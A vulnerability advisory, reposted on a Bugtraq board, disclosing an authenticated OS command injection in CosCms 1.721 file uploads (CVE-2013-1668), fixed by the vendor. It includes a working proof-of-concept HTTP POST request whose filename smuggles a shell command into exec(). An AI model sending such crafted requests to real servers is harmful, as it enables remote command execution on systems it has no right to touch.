看板 Bugtraq 關於我們 聯絡資訊
Advisory ID: HTB23145 Product: CosCms Vendor: http://www.coscms.org Vulnerable Version(s): 1.721 and probably prior Tested Version: 1.721 Vendor Notification: February 13, 2013=20 Vendor Patch: February 13, 2013=20 Public Disclosure: March 6, 2013=20 Vulnerability Type: OS Command Injection [CWE-78] CVE Reference: CVE-2013-1668 Risk Level: High=20 CVSSv2 Base Score: 8.5 (AV:N/AC:M/Au:S/C:C/I:C/A:C) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://w= ww.htbridge.com/advisory/ )=20 ---------------------------------------------------------------------------= -------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered vulnerability in CosCms, = which can be exploited to execute arbitrary OS commands on web server where= the vulnerable application is hosted. 1) OS Command Injection in CosCms: CVE-2013-1668 Vulnerability exists due to insufficient validation of user-supplied input = in "$_FILES['file']['name']" variable passed to "/gallery/upload/index" URL= before using it in PHP "exec()" function. A remote attacker can send a spe= cially crafted HTTP POST request containing a malicious filename, and execu= te arbitrary commands on the target system with privileges of the web serve= r. The following PoC (Proof of Concept) code will write output of "ls -la" com= mand into "/gallery/upload/file.txt" file. You can use any tool to send raw= HTTP requests, e.g. telnet: POST /gallery/upload/index HTTP/1.1 Content-Type: multipart/form-data; boundary=3D---------------------------21= 456260222104 Content-Length: 970 -----------------------------21456260222104 Content-Disposition: form-data; name=3D"title" 1 -----------------------------21456260222104 Content-Disposition: form-data; name=3D"image_add" 1 -----------------------------21456260222104 Content-Disposition: form-data; name=3D"description" 1 -----------------------------21456260222104 Content-Disposition: form-data; name=3D"tags" -----------------------------21456260222104 Content-Disposition: form-data; name=3D"MAX_FILE_SIZE" 100000000 -----------------------------21456260222104 Content-Disposition: form-data; name=3D"APC_UPLOAD_PROGRESS" 511ad0922b50f -----------------------------21456260222104 Content-Disposition: form-data; name=3D"file"; filename=3D"1 & ls -la > fil= e.txt" Content-Type: application/octet-stream 1 -----------------------------21456260222104 Content-Disposition: form-data; name=3D"submit" Update -----------------------------21456260222104--=09 Successful exploitation of this vulnerability requires an attacker to be lo= gged-in and have privileges to upload files. User registration is disabled = by default. ---------------------------------------------------------------------------= -------------------- Solution: Upgrade to CosCms 1.822 More Information: http://www.coscms.org/blog/view/4/Version-1.822 https://github.com/diversen/gallery/blob/master/upload/index.php https://github.com/diversen/gallery/commit/7d58f870e8edc6597485dd1b80ea9fb7= 8580190c ---------------------------------------------------------------------------= -------------------- References: [1] High-Tech Bridge Advisory HTB23145 - https://www.htbridge.com/advisory/= HTB23145 - OS Command Injection in CosCms. [2] CosCms - http://www.coscms.org/ - CosCMS is a simple framework for buil= ding web application. It is intended for users, who wants some common modul= es, and a platform with a small code base which is easy to extend. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - in= ternational in scope and free for public use, CVE=C2=AE is a dictionary of = publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to = developers and security practitioners, CWE is a formal list of software wea= kness types.=20 ---------------------------------------------------------------------------= -------------------- Disclaimer: The information provided in this Advisory is provided "as is" a= nd without any warranty of any kind. Details of this Advisory may be update= d in order to provide as accurate information as possible. The latest versi= on of the Advisory is available on web page [1] in the References.